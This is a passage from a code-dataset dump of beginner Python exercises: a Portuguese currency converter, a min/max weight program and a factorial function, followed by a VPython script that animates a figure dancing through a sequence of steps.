RUB[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Rublo e {moeda * RUB[4]:.2f}')\n\n\ndef Real():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Real e {moeda * REAL[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Real e{moeda * REAL[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Real e {moeda * REAL[2]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Real e {moeda * REAL[3]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Real e {moeda * REAL[4]:.2f}')\n\n\nwhile True:\n print('Qual moeda voce utiliza: ')\n print(\"=*\" * 12)\n print(\"=*\" * 3, '( 1 ) Dolar\\n', end=\"\")\n print(\"=*\" * 3, '( 2 ) Franco\\n', end=\"\")\n print(\"=*\" * 3, '( 3 ) Euro\\n', end=\"\")\n print(\"=*\" * 3, '( 4 ) Iene\\n', end=\"\")\n print(\"=*\" * 3, '( 5 ) Rublo\\n', end=\"\")\n print(\"=*\" * 3, '( 6 ) Real\\n', end=\"\")\n print(\"=*\" * 3, '( 7 ) Sair')\n print(\"=*\" * 12)\n opc = int(input('Digite opcao desejada de moeda 1 a 6 : '))\n if opc == 1:\n moeda = float(input('Digite o valor em Dolar voce deseja converte: \\n'))\n elif opc == 2:\n moeda = float(input('Digite o valor em Franco voce deseja converte: \\n'))\n elif opc == 3:\n moeda = float(input('Digite o valor em Euro voce deseja converte: \\n'))\n elif opc == 4:\n moeda = float(input('Digite o valor em Iene voce deseja converte: \\n'))\n elif opc == 5:\n moeda = float(input('Digite o valor em Rublo voce deseja converte: \\n'))\n elif opc == 6:\n moeda = float(input('Digite o valor em Real voce deseja converte: \\n'))\n elif opc == 7:\n print(\"Obrigado por usar o programa, Ate a proxima\")\n else:\n while opc > 7 or opc < 1:\n print('Opção invalida somente numeros inteiros de 1 a 7')\n opc = int(input('Digite opcao de moeda 1 a 6 : '))\n\n print('Para qual moeda voce deseja fazer intercambio: ')\n print('( 1 ) Dolar\\n'\n '( 2 ) Franco\\n'\n '( 3 ) Euro\\n'\n '( 4 ) Iene\\n'\n '( 5 ) Rublo\\n'\n '( 6 ) real \\n'\n '( 7 ) Todos'\n '( 8 ) Sair')\n\n print('Para qual voce deseja converter')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n while opcao > 8 or opcao < 1:\n print('Opção invalida somente numeros inteiros de 1 a 7')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n\n while opcao == opc:\n print('Não pode ser a mesma moeda')\n opcao = int(input('Digite opcao de moeda para interecambia de 1 a 7 : '))\n if opcao == 1:\n Dolar()\n elif opcao == 2:\n Franco()\n elif opcao == 3:\n Euro()\n elif opcao == 4:\n Iene()\n elif opcao == 5:\n Rublo()\n elif opcao == 6:\n Real()\n elif opcao == 7:\n Dolar()\n Franco()\n Euro()\n Iene()\n Rublo()\n Dolar()\n elif opcao == 8:\n print(\"Obrigado por usar o programa, Ate a proxima\")\n break\n"
},
{
"alpha_fraction": 0.5550239086151123,
"alphanum_fraction": 0.5645933151245117,
"avg_line_length": 26.799999237060547,
"blob_id": "67bd1d950b66ba0fb2fd622eb42d7424a99936fc",
"content_id": "84adfee96bf75abb7ba4547f752d2ea990d5ad63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/EX 055_Maior_e_menor_pesoV2.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "maior = 0\nmenor = 0\nnum = int(input(\"Digite quantas pessoas deseja adicionar: \"))\nfor c in range(1, num):\n peso = float(input(f'Digite o peso da {c} pessoa:'))\n if c == 1: \n maior = peso\n menor = peso\n else:\n if peso > maior:\n maior = peso \n if peso < menor:\n menor = peso\nprint(f\"O maior peso encontrado {maior}\")\nprint(f'O menor peso encontrado {menor}')\n\n"
},
{
"alpha_fraction": 0.4500907361507416,
"alphanum_fraction": 0.46098002791404724,
"avg_line_length": 22.95652198791504,
"blob_id": "2559e94f31426ceba0c7e51e9875fbca2d2dcfca",
"content_id": "691d02ff5569f2c8cbc02d8dafd92e92da145469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 23,
"path": "/EX 102_Função para Fatorial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def factorial(n , show = False):\n \"\"\"\n -> Calcula o fatorial de um numero\n :param n: O numero a ser calculado\n :param show: (optional) Mostra ou não a conta .\n :return: O valor do fatorial de um numero n.\n \"\"\"\n \n f = 1\n for c in range(n, 0, -1):\n print(f'{c}', end=' ')\n if show:\n print(f'{c}', end=' ')\n if c > 1:\n print(' X ', end='')\n else:\n print(' = ', end='')\n f *= c\n return f\n\n#print(factorial(10, show = True))\n\nhelp(factorial)\n"
}
] | 76 |
imotyashok/dancing-dude | https://github.com/imotyashok/dancing-dude | 933a71869919420e3ca79dbec24b58387f33514c | b39535e8982b55fa073478bd453f2c7cc80da1df | 3fc8e6e209d4c6ae153a54738f087421974811c7 | refs/heads/master | 2020-09-11T17:07:43.366695 | 2019-11-16T18:31:49 | 2019-11-16T18:31:49 | 222,133,641 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3882484436035156,
"alphanum_fraction": 0.48577263951301575,
"avg_line_length": 29.190895080566406,
"blob_id": "4772897bb4fe0e45d4741b265fe131e355473322",
"content_id": "cbc0741caf64f704507859db8e54268c2457ed4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20559,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 681,
"path": "/finalproject.py",
"repo_name": "imotyashok/dancing-dude",
"src_encoding": "UTF-8",
"text": "# GlowScript 2.7 VPython\nfrom vpython import *\n\n\ndef Head():\n head = sphere(pos=vector(0, 4, 0), radius=1,\n texture=\"https://farm5.staticflickr.com/4855/46098387042_fc66d2185f_b.jpg\")\n return head\n\n\ndef Torso():\n torso = box(pos=vector(0, 1.25, 0),\n axis=vector(1, -10, 0), length=2,\n height=3, width=2, up=vector(0, 3, 1),\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return torso\n\n\ndef Leftarm():\n leftarm = cylinder(pos=vector(0.9, 2.2, 1),\n axis=vector(1, -3, 0), radius=0.5,\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return leftarm\n\n\ndef Rightarm():\n rightarm = cylinder(pos=vector(-1, 2.5, 0),\n axis=vector(-1, -3, -0.5), radius=0.5,\n texture=\"https://c1.staticflickr.com/3/2032/2344934553_09829bd59c_b.jpg\")\n return rightarm\n\n\ndef Leftleg():\n leftleg = cylinder(pos=vector(0.5, -0.25, -0.5),\n axis=vector(0, -4, -1), radius=0.6,\n texture=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQluZghTkuwfJZy_UsZrUaPePlr0CDM2gSK7Gzk3pn2J8EEeVeh\")\n return leftleg\n\n\ndef Rightleg():\n rightleg = cylinder(pos=vector(-0.75, -0.25, -0.5),\n axis=vector(0, -4, -1), radius=0.6,\n texture=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQluZghTkuwfJZy_UsZrUaPePlr0CDM2gSK7Gzk3pn2J8EEeVeh\")\n return rightleg\n\n\ndef Step1(h, t, la, ra, ll, rl):\n i = 0\n dy = 0.2\n while i <= 10:\n # step 2: he does a split -- down motion\n rate(50)\n h.pos.y -= dy\n t.pos.y -= dy\n ll.pos.y -= dy\n rl.pos.y -= dy\n ra.pos.y -= dy\n la.pos.y -= dy\n ll.rotate(angle=(-pi) / 25, axis=vec(0, 0, -5))\n rl.rotate(angle=(pi) / 20, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 20, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 50, axis=vec(0, 0, 5))\n i += 1\n\n\ndef Step2(h, t, la, ra, ll, rl):\n k = 10\n dy = 0.2\n while k >= 0:\n # step 3: he returns to position\n rate(50) # rate = 50\n h.pos.y += dy\n t.pos.y += dy\n ll.pos.y += dy\n rl.pos.y += dy\n ra.pos.y += dy\n la.pos.y += dy\n k -= 1\n ll.rotate(angle=(pi) / 25, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 20, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 20, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 50, axis=vec(0, 0, 5))\n\n\ndef Step3(h, t, la, ra, ll, rl):\n i = 0\n while i < 10:\n # step 4: he raises left arm, steps to side\n rate(50) # rate = 50\n ra.pos.y -= 0.05\n ra.pos.z += 0.05\n ra.pos.x += 0.02\n ll.pos.x += 0.08\n h.pos.y -= 0.01\n h.pos.x -= 0.03\n t.pos.x += 0.03\n ll.rotate(angle=(-pi) / 75, axis=vec(0, 0, -5))\n rl.pos.x += 0.05\n t.rotate(angle=-pi / 150, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 13, axis=vec(0, 1, -5))\n ra.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=-pi / 50, axis=vec(0, 5, 0))\n\n i += 1\n\n\ndef Step4(h, t, la, ra, ll, rl):\n i = 10\n while i >= 0:\n # step 5: he returns to position\n rate(50)\n ra.pos.y += 0.05\n ra.pos.z -= 0.05\n ra.pos.x -= 0.02\n ll.pos.x -= 0.08\n h.pos.y += 0.01\n h.pos.x += 0.03\n t.pos.x -= 0.03\n ll.rotate(angle=(pi) / 90, axis=vec(0, 0, -5))\n rl.pos.x -= 0.05\n t.rotate(angle=pi / 150, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 13, axis=vec(0, 1, -5))\n ra.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 130, axis=vec(0, 0, -5))\n h.rotate(angle=pi / 50, axis=vec(0, 5, 0))\n\n i -= 1\n\n\ndef Step5(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 6: he raises right arm\n rate(50) # rate = 50\n h.pos.x += 0.05\n h.pos.y -= 0.02\n ll.pos.x += 0.01\n ll.pos.z += 0.03\n ll.pos.y -= 0.01\n rl.pos.x -= 0.02\n t.pos.x += 0.01\n la.pos.y -= 0.01\n la.pos.x += 0.01\n ra.pos.x += 0.01\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(-pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 13, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(pi) / 50, axis=vec(0, 5, 0))\n\n i += 1\n\n\ndef Step6(h, t, la, ra, ll, rl):\n i = 10\n while i >= 0:\n # he returns to position\n rate(50) # rate = 50\n h.pos.x -= 0.05\n h.pos.y += 0.02\n ll.pos.x -= 0.01\n ll.pos.z -= 0.03\n ll.pos.y += 0.01\n rl.pos.x += 0.02\n t.pos.x -= 0.01\n la.pos.y += 0.01\n la.pos.x -= 0.01\n ra.pos.x -= 0.01\n rl.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(-pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 13, axis=vec(0, 0, -5))\n la.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(-pi) / 50, axis=vec(0, 5, 0))\n i -= 1\n\n\ndef Step7(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(40) # rate = 40\n h.pos.x += 0.05\n h.pos.y -= 0.02\n ll.pos.x += 0.01\n ll.pos.z += 0.03\n ll.pos.y -= 0.01\n rl.pos.x -= 0.02\n t.pos.x += 0.01\n la.pos.y -= 0.01\n la.pos.x += 0.01\n ra.pos.x += 0.01\n rl.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n ll.rotate(angle=(-pi) / 110, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 230, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 15, axis=vec(0, 0, -5))\n la.rotate(angle=(-pi) / 100, axis=vec(0, 0, -5))\n h.rotate(angle=(pi) / 50, axis=vec(0, 15, 0))\n\n i += 1\n\n\ndef Step8(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 7 in diagram\n rate(40) # rate = 40\n h.pos.x -= 0.02\n h.pos.y -= 0.02\n h.pos.z += 0.1\n t.pos.x += 0.02\n ll.pos.x += 0.025\n rl.pos.x += 0.05\n la.pos.x += 0.01\n ra.pos.x += 0.01\n ll.pos.y += 0.01\n rl.pos.y += 0.01\n t.rotate(angle=(pi) / 200, axis=vec(0, 0, 5))\n ll.rotate(angle=(pi) / 150, axis=vec(0, 0, -5))\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ra.rotate(angle=(pi) / 50, axis=vec(0, 8, -10))\n la.rotate(angle=(-pi) / 13, axis=vec(0, 1, -5))\n # torso.pos.x\n i += 1\n\n\ndef Step9(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 8 in diagram\n rate(40) # rate = 40\n t.pos.y -= 0.02\n t.pos.x -= 0.01\n t.rotate(angle=(pi) / 100, axis=vec(0, 0, -5))\n rl.pos.y -= 0.01\n rl.pos.x -= 0.05\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ll.pos.y -= 0.02\n ll.pos.x -= 0.04\n ll.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n ra.rotate(angle=(-pi) / 14, axis=vec(0, 0, -5))\n ra.pos.x += 0.03\n ra.pos.y += 0.01\n la.rotate(angle=(pi) / 28, axis=vec(0, 1, -5))\n la.pos.y -= 0.05\n h.pos.y -= 0.02\n h.pos.x += 0.04\n h.pos.z -= 0.03\n\n i += 1\n\n\ndef Step10(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 9\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 55, axis=vec(0, 0, -5))\n t.pos.x += 0.01\n t.pos.y -= 0.02\n ll.pos.x += 0.08\n ll.pos.y -= 0.01\n ll.rotate(angle=(pi) / 85, axis=vec(0, 0, -5))\n rl.pos.x += 0.09\n rl.pos.y -= 0.04\n rl.rotate(angle=(pi) / 140, axis=vec(0, 0, -5))\n la.pos.x -= 0.03\n la.pos.y += 0.02\n ra.pos.z -= 0.01\n ra.pos.x -= 0.04\n ra.pos.y -= 0.08\n h.pos.y -= 0.02\n h.pos.x -= 0.09\n\n i += 1\n\n\ndef Step11(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 10\n rate(40) # rate = 40\n t.rotate(angle=(pi) / 55, axis=vec(0, 0, -5))\n t.pos.x -= 0.01\n t.pos.y += 0.02\n ll.pos.x -= 0.08\n ll.pos.y += 0.01\n ll.rotate(angle=(-pi) / 85, axis=vec(0, 0, -5))\n rl.pos.x -= 0.09\n rl.pos.y += 0.04\n rl.rotate(angle=(-pi) / 140, axis=vec(0, 0, -5))\n la.pos.x += 0.03\n la.pos.y -= 0.02\n ra.pos.z += 0.01\n ra.pos.x += 0.04\n ra.pos.y += 0.08\n h.pos.y += 0.02\n h.pos.x += 0.09\n\n i += 1\n\n\ndef Step12(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 11\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 60, axis=vec(0, 0, -5))\n t.pos.x += 0.01\n t.pos.y -= 0.01\n ra.pos.x -= 0.04\n ra.pos.y -= 0.05\n ra.pos.z += 0.05\n ra.rotate(angle=pi / 10, axis=vec(-20, -5, 15))\n la.pos.x -= 0.02\n la.pos.y += 0.035\n la.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n rl.pos.x += 0.08\n rl.pos.y -= 0.02\n rl.pos.z += 0.02\n rl.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n ll.pos.x += 0.08\n ll.pos.z += 0.02\n ll.rotate(angle=pi / 100, axis=vec(0, 0, -5))\n h.pos.x -= 0.09\n h.pos.y -= 0.01\n h.rotate(angle=(-pi) / 50, axis=vec(0, 15, 0))\n\n i += 1\n\n\ndef Step13(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 12\n rate(30) # rate = 30\n t.pos.x += 0.1\n t.rotate(angle=(pi) / 80, axis=vec(0, 0, -5))\n t.rotate(angle=(pi) / 10, axis=vec(0, 15, 7))\n h.pos.x += 0.18\n h.pos.y += 0.01\n h.rotate(angle=(pi) / 12, axis=vec(0, 5, 0))\n la.pos.x -= 0.04\n la.pos.y += 0.01\n la.pos.z -= 0.02\n la.rotate(angle=(pi) / 10, axis=vec(0, 10, 5))\n ra.rotate(angle=(pi) / 10, axis=vec(0, 5, 5))\n ra.pos.x += 0.333\n ll.pos.x -= 0.05\n ll.pos.y -= 0.01\n ll.rotate(angle=(pi) / 20, axis=vec(0, 10, 0))\n rl.pos.x += 0.2\n rl.pos.y -= 0.03\n rl.pos.z -= 0.02\n rl.rotate(angle=(pi) / 15, axis=vec(0, 10, 0))\n\n i += 1\n\n\ndef Step14(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 13\n rate(50) # rate = 40\n t.rotate(angle=(pi) / 85, axis=vec(0, 0, 5))\n t.pos.x += 0.05\n la.rotate(angle=(-pi) / 150, axis=vec(0, 0, -5))\n la.pos.y -= 0.04\n la.pos.x += 0.015\n la.pos.z += 0.02\n # rightarm.rotate(angle=(-pi)/100, axis=vec(0,0,5))\n ra.pos.x += 0.01\n ra.pos.y += 0.015\n ra.pos.z += 0.01\n ll.pos.x += 0.08\n ll.pos.y -= 0.01\n ll.rotate(angle=(-pi) / 170, axis=vec(0, 0, 5))\n rl.pos.x += 0.08\n rl.pos.y -= 0.02\n rl.pos.z -= 0.02\n rl.rotate(angle=(-pi) / 150, axis=vec(0, 0, 5))\n h.pos.x -= 0.05\n h.pos.y -= 0.005\n\n i += 1\n\n\ndef Step15(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 14 --returns to position at step 12\n rate(40) # rate = 40\n t.rotate(angle=(-pi) / 85, axis=vec(0, 0, 5))\n t.pos.x -= 0.05\n la.rotate(angle=(pi) / 150, axis=vec(0, 0, -5))\n la.pos.y += 0.04\n la.pos.x -= 0.015\n la.pos.z -= 0.02\n # rightarm.rotate(angle=(-pi)/100, axis=vec(0,0,5))\n ra.pos.x -= 0.01\n ra.pos.y -= 0.015\n ra.pos.z -= 0.01\n ll.pos.x -= 0.08\n ll.pos.y += 0.01\n ll.rotate(angle=(pi) / 170, axis=vec(0, 0, 5))\n rl.pos.x -= 0.08\n rl.pos.y += 0.02\n rl.pos.z += 0.02\n rl.rotate(angle=(pi) / 150, axis=vec(0, 0, 5))\n h.pos.x += 0.05\n h.pos.y += 0.005\n\n i += 1\n\n\ndef Step16(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n # step 15\n rate(40) # rate = 40\n t.pos.x += 0.2\n t.rotate(angle=(pi) / 11.5, axis=vec(0.75, 15, 3.5))\n la.pos.x += 0.35\n la.rotate(angle=(pi) / 11.5, axis=vec(0, 10, 0))\n ra.pos.x -= 0.03\n ra.rotate(angle=(pi) / 11, axis=vec(0.5, 10, 3.5))\n h.pos.x += 0.15\n h.rotate(angle=(pi) / 11, axis=vec(0, 10, 1))\n ll.pos.x += 0.333\n ll.rotate(angle=(pi) / 11.5, axis=vec(0, 10, 0))\n rl.pos.x += 0.1\n rl.rotate(angle=(pi) / 15, axis=vec(0.5, 10, -2))\n\n i += 1\n\n\ndef Step17(h, t, la, ra, ll, rl):\n sleep(0.3)\n i = 0\n while i <= 5:\n rate(10) # rate = 10\n if h.pos.x < 3:\n h.pos.x += 0.4\n h.pos.y += 0.04\n else:\n h.pos.x -= 0.25\n h.pos.y -= 0.01\n i += 1\n\n\ndef Step18(h, t, la, ra, ll, rl):\n sleep(0.05)\n i = 0\n while i <= 10:\n # step 16\n rate(25) # rate = 25\n t.pos.y -= 0.2\n t.pos.x += 0.1\n t.rotate(angle=(pi) / 30, axis=vec(-3, 0, 10))\n la.pos.y -= 0.15\n la.pos.x -= 0.065\n la.pos.z -= 0.02\n la.rotate(angle=(pi) / 150, axis=vec(0, 0, 10))\n ra.rotate(angle=(pi) / 150, axis=vec(0, 0, 5))\n ll.pos.y -= 0.06\n ll.pos.x += 0.2\n ll.rotate(angle=(pi) / 50, axis=vec(0, 0, 10))\n rl.pos.x += 0.26\n rl.pos.y -= 0.16\n rl.rotate(angle=(pi) / 40, axis=vec(0, 0, 10))\n ra.pos.x += 0.05\n ra.pos.y -= 0.35\n ra.rotate(angle=(pi) / 14, axis=vec(-1, 0, 10))\n h.pos.y -= 0.333\n h.pos.x -= 0.1\n h.pos.z -= 0.01\n h.rotate(angle=(pi) / 70, axis=vec(0, 0, 10))\n\n i += 1\n\n\ndef Step19(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(35)\n t.pos.x -= 0.1\n t.pos.y += 0.08\n t.rotate(angle=(pi) / 30, axis=vec(-3, 0, 10))\n la.pos.x -= 0.15\n la.pos.y -= 0.05\n la.pos.z -= 0.03\n la.rotate(angle=(pi) / 12, axis=vec(0, -3, 10))\n h.pos.y -= 0.14\n h.pos.x -= 0.07\n h.pos.z -= 0.06\n h.rotate(angle=(pi) / 20, axis=vec(0, -3, 10))\n ll.pos.x -= 0.22\n ll.pos.y += 0.2\n ll.rotate(angle=(pi) / 11, axis=vec(0, 0, 10))\n rl.pos.x -= 0.08\n rl.pos.y += 0.25\n rl.rotate(angle=(pi) / 55, axis=vec(0, -3, 10))\n\n i += 1\n\n\ndef Step20(h, t, la, ra, ll, rl):\n # sleep(1)\n i = 0\n while i <= 10:\n rate(20)\n # t.pos.x -= 0.07\n # t.pos.y += 0.02\n # t.rotate(angle=(pi)/10.5, axis=vec(0,10,-0.5))\n t.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3.1, -1.5, 0))\n h.rotate(angle=pi / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n rl.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n ll.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n la.rotate(angle=(pi) / 5.5, axis=vec(0, 10, 0), origin=vec(3, 0, 0))\n ra.rotate(angle=pi / 5.5, axis=vec(0, 10, 0))\n\n i += 1\n\n\ndef Step21(h, t, la, ra, ll, rl):\n sleep(0.1)\n i = 0\n while i <= 10:\n rate(40)\n t.rotate(angle=pi / 100, axis=vec(0, 0, 10), origin=vec(1, 0, 0))\n t.pos.y -= 0.05\n t.pos.x -= 0.05\n ll.rotate(angle=-pi / 150, axis=vec(0, 0, 10), origin=vec(3, 5, 0))\n rl.rotate(angle=pi / 25, axis=vec(0, 0, 10), origin=vec(4.5, 0, 0))\n la.rotate(angle=-pi / 40, axis=vec(0, 0, 10), origin=vec(0.4, -0.08, 0))\n la.pos.y += 0.05\n h.rotate(angle=pi / 150, axis=vec(0, 0, 10), origin=vec(4, -1, 0))\n\n i += 1\n\n\ndef Step22(h, t, la, ra, ll, rl):\n sleep(0.05)\n i = 0\n while i <= 10:\n rate(45)\n ll.rotate(angle=-pi / 35, axis=vec(0, 0, 10))\n ra.rotate(angle=-pi / 100, axis=vec(0, 0, 10))\n la.rotate(angle=pi / 40, axis=vec(0, 0, 10))\n h.rotate(angle=-pi / 100, axis=vec(5, 0, 10))\n\n i += 1\n\n\ndef Step23(h, t, la, ra, ll, rl):\n # sleep(1.5)\n i = 0\n while i <= 10:\n rate(45)\n t.rotate(angle=-pi / 13, axis=vec(-3.8, 0, 10), origin=vec(5, -0.5, 0))\n rl.rotate(angle=-pi / 11.333, axis=vec(0, 0, 10), origin=vec(5.5, -0.5, 0))\n ll.rotate(angle=-pi / 13.333, axis=vec(0, 0, 10), origin=vec(5.75, -0.7, 0))\n ll.pos.x += 0.0333\n ll.pos.y -= 0.155\n ra.rotate(angle=-pi / 15, axis=vec(0, 0, 10), origin=vec(5, -0.75, 0))\n la.rotate(angle=-pi / 13.333, axis=vec(0, 0, 10), origin=vec(5.25, -0.7, 0))\n h.rotate(angle=-pi / 13, axis=vec(-3.8, 0, 10), origin=vec(5, -0.5, 0))\n # ra.pos.x += 0.3\n # ra.pos.y -= 0.025\n\n i += 1\n\n\ndef Step24(h, t, la, ra, ll, rl):\n sleep(0.1)\n i = 0\n while i <= 10:\n rate(40)\n la.rotate(angle=pi / 40, axis=vec(0, 0, 10))\n h.rotate(angle=pi / 70, axis=vec(-2, 5, 5))\n ll.rotate(angle=-pi / 135, axis=vec(0, 0, 10))\n # ll.pos.x += 0.01\n\n i += 1\n\n\ndef Step25(h, t, la, ra, ll, rl):\n sleep(0.1)\n while t.pos.x > 0:\n rate(15)\n t.pos.x -= 0.8\n h.pos.x -= 0.8\n la.pos.x -= 0.95\n la.pos.z += 0.225\n la.pos.y -= 0.01\n ra.pos.x -= 0.85\n ra.pos.z += 0.05\n ll.pos.x -= 0.9\n ll.pos.z += 0.1\n rl.pos.x -= 0.95\n rl.pos.z += 0.1\n t.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n h.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n la.rotate(angle=pi / 20, axis=vec(2, 5, 0))\n ra.rotate(angle=pi / 3.9, axis=vec(0, 10, 0.5))\n ll.rotate(angle=-pi / 2, axis=vec(0, 10, 0.5))\n rl.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n\n\ndef Step26(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(25)\n h.rotate(angle=pi / 50, axis=vec(0, 10, 0.5))\n t.rotate(angle=pi / 100, axis=vec(0, 10, 0.5))\n rl.rotate(angle=pi / 100, axis=vec(0, -10, 0))\n rl.pos.x += 0.02\n la.rotate(angle=-pi / 15, axis=vec(0, 0, 10))\n la.pos.x += 0.02\n ra.rotate(angle=pi / 15, axis=vec(0, 0, 10))\n\n i += 1\n\n\nhead = Head()\ntorso = Torso()\nleftarm = Leftarm()\nrightarm = Rightarm()\nleftleg = Leftleg()\nrightleg = Rightleg()\n\nsleep(2)\nStep1(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.05)\nStep2(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep3(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep4(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep5(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep6(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep3(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep4(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep5(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep6(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep7(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep8(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep9(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.2)\nStep10(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep11(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep10(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep11(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep12(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.2)\nStep13(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep16(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep17(head, torso, leftarm, rightarm, leftleg, rightleg)\n# from now on, functions have sleep built into them\nStep18(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep19(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep21(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep22(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep23(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep24(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep25(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep26(head, torso, leftarm, rightarm, leftleg, rightleg)"
},
{
"alpha_fraction": 0.7769953012466431,
"alphanum_fraction": 0.7852112650871277,
"avg_line_length": 120.64286041259766,
"blob_id": "b384296aae4af60bd3fa861c821d066636d50bbf",
"content_id": "b05be7cf98fd9e79b91d1541967b581358177393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
